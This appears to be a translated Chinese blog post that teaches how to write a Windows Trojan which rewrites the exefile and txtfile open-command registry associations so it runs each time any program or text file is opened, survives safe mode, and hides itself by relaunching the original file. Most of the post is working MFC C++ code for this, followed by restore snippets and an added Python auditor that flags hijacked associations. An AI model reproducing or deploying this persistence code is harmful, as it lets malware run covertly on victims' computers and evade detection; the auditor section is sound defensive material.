Programming idea behind a file-association Trojan

zhaozj2021-02-17  75

We know that the usual way to make a program start with Windows is to write it into the registry under one of:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

Because these values are so well known, a program placed there is easy to spot and remove, and when Windows boots into safe mode the programs listed there are not run at all. If instead we put our program somewhere else in the registry, we get a much better result.

The value HKEY_CLASSES_ROOT\exefile\shell\open\command is the file association for executable (*.exe) files; its default is "%1" %*. If this value is changed to point at our Trojan, then every executable program launched will run our program instead of the original one, so our Trojan starts. What we have to do is, once our Trojan is running, execute the original program ourselves, so that an ordinary user notices nothing. Enough talk, let's start doing it.

1. First, use VC to create a dialog-based program named START.

2. Add a public member variable HANDLE hMutex to CStartDlg; it prevents our Trojan from running more than once at a time.

3. Add the following code to CStartDlg::OnInitDialog():

CString str;
str.Format("%s", AfxGetApp()->m_lpCmdLine);   // get the command-line arguments passed in
const char *mutexObject = "mystart";         // name of the mutex
hMutex = NULL;
hMutex = ::CreateMutex(NULL, FALSE, mutexObject);
if (hMutex != NULL)
{
    DWORD err = GetLastError();
    if (err == ERROR_ALREADY_EXISTS) ::PostQuitMessage(0);   // an instance is already running: exit
}
if (str != "")
{
    CString temp;
    char ch;
    int length = str.GetLength();
    for (int i = 0; i < length; i++)
    {
        ch = str.GetAt(i);
        if (ch == '\\')
            temp = temp + "\\\\";
        else temp = temp + ch;
    }
    temp = temp.Left(temp.GetLength() - 2);
    temp = temp.Mid(1);   // the loop above changes every "\" in the string to "\\"
    char str1[] = "\"%1\" %*";
    ::RegSetValue(HKEY_CLASSES_ROOT, "exefile\\shell\\open\\command",
                  REG_SZ, (LPCTSTR)str1, strlen(str1) + 1);
    // The registry must be restored before the original program is run, otherwise
    // ShellExecute would go through the association and start our Trojan again.
    ShellExecute(NULL, "open", temp, NULL, NULL, SW_SHOW);   // run the original program
}
// After the original program has been run, point the association back at the Trojan we want to start.
TCHAR str2[256];
// Get the full path of this program
GetModuleFileName(NULL, str2, 255);
strcat(str2, " \"%1\" %*");
::RegSetValue(HKEY_CLASSES_ROOT, "exefile\\shell\\open\\command",
              REG_SZ, (LPCTSTR)str2, strlen(str2) + 1);
// With the above in place, whenever any program is launched our START program runs first.
// Even in safe mode, our program runs as soon as any executable is launched.

In the same way we can associate other file types as well. For text files, for example, put the following in CStartDlg::OnInitDialog() instead:

CString str;
str.Format("%s", AfxGetApp()->m_lpCmdLine);   // get the command-line arguments passed in
const char *mutexObject = "mystart";         // name of the mutex
hMutex = NULL;
hMutex = ::CreateMutex(NULL, FALSE, mutexObject);
if (hMutex != NULL)
{
    DWORD err = GetLastError();
    if (err == ERROR_ALREADY_EXISTS) ::PostQuitMessage(0);   // an instance is already running: exit
}
if (str.Find("txt") != -1)
{
    CString temp;
    char ch;
    int length = str.GetLength();
    for (int i = 0; i < length; i++)
    {
        ch = str.GetAt(i);
        if (ch == '\\')
            temp = temp + "\\\\";
        else temp = temp + ch;
    }
    temp = temp.Left(temp.GetLength() - 2);
    temp = temp.Mid(1);   // the loop above changes every "\" in the string to "\\"
    // No restore is needed here: notepad.exe is launched directly rather than through the txtfile association.
    ShellExecute(NULL, "open", "notepad.exe", temp, NULL, SW_SHOW);   // open the original file
}
// After the original file has been opened, point the association at the Trojan we want to start.
TCHAR str2[256];
// Get the full path of this program
GetModuleFileName(NULL, str2, 255);
strcat(str2, " \"%1\" %*");
::RegSetValue(HKEY_CLASSES_ROOT, "txtfile\\shell\\open\\command",
              REG_SZ, (LPCTSTR)str2, strlen(str2) + 1);
// With the above in place, whenever a text file is opened our START program runs first.

Of course, after running these programs on your own machine you can restore the associations with the following:

char str2[] = "notepad.exe %1";
::RegSetValue(HKEY_CLASSES_ROOT, "txtfile\\shell\\open\\command",
              REG_SZ, (LPCTSTR)str2, strlen(str2) + 1);
char str1[] = "\"%1\" %*";
::RegSetValue(HKEY_CLASSES_ROOT, "exefile\\shell\\open\\command",
              REG_SZ, (LPCTSTR)str1, strlen(str1) + 1);
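The defender's counterpart to the two associations above is to check whether they still hold their defaults. The following is an added example, not code from the article: it parses an exported .reg file (for instance the output of `reg export HKCR\exefile\shell\open\command exefile.reg` on Windows) and flags any exefile or txtfile command value that deviates from the default. The key paths are the ones named in the article; the expected value strings are those the article's restore code writes back, plus the full-path notepad.exe form found on real systems, which is an assumption; the sample .reg text and the `C:\start.exe` path in it are constructed.

```python
"""Audit exefile/txtfile shell\\open\\command defaults from a .reg export (added example)."""

# Key paths as given in the article; expected values are those the article's restore
# code writes back, plus (assumption) the full-path notepad.exe form seen on real systems.
EXPECTED = {
    r"HKEY_CLASSES_ROOT\exefile\shell\open\command": {'"%1" %*'},
    r"HKEY_CLASSES_ROOT\txtfile\shell\open\command": {
        "notepad.exe %1",
        r"%SystemRoot%\system32\NOTEPAD.EXE %1",
    },
}

# Constructed sample in .reg syntax: the exefile command has been pointed at start.exe
# (a hypothetical path); the txtfile command is still the default.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="C:\\start.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="notepad.exe %1"
'''


def unescape_reg(s):
    """Undo .reg string escaping: a backslash escapes the next character (\\\\ and \\")."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_export(text):
    """Return {key_path: default_value} for every key in the export that has a string @ value."""
    defaults, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current and line.startswith('@="') and line.endswith('"'):
            defaults[current] = unescape_reg(line[3:-1])
    return defaults


def audit(defaults):
    """Compare parsed defaults with EXPECTED; return a list of (key, value, verdict)."""
    by_key = {k.lower(): v for k, v in defaults.items()}   # registry paths are case-insensitive
    findings = []
    for key, good in EXPECTED.items():
        value = by_key.get(key.lower())
        if value is None:
            verdict = "missing"
        elif value.strip().lower() in {g.lower() for g in good}:
            verdict = "ok"
        else:
            verdict = "hijacked"   # anything else runs before or instead of the real program
        findings.append((key, value, verdict))
    return findings


def audit_reg_file(path):
    """reg.exe writes exports as UTF-16 with a BOM; decode accordingly."""
    with open(path, encoding="utf-16") as fh:
        return audit(parse_reg_export(fh.read()))


if __name__ == "__main__":
    for key, value, verdict in audit(parse_reg_export(SAMPLE_REG)):
        print(f"{verdict:8s} {key} = {value!r}")
```

Run against the constructed sample, the exefile entry is reported as hijacked and the txtfile entry as ok. The same check is worth scheduling on real exports, since the article's own point is that this location survives safe mode and is not covered by a look at the Run keys; a command value that names anything other than the default, especially a program in a user-writable directory, is the indicator.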

Of course, this program runs fine on Win98; on Win2000 it cannot open folders on the desktop, and I do not know what the problem is. If you know, please tell me:

Sunyuzhe@263.net

Please credit the original URL when reposting: https://www.9cbs.com/read-29228.html
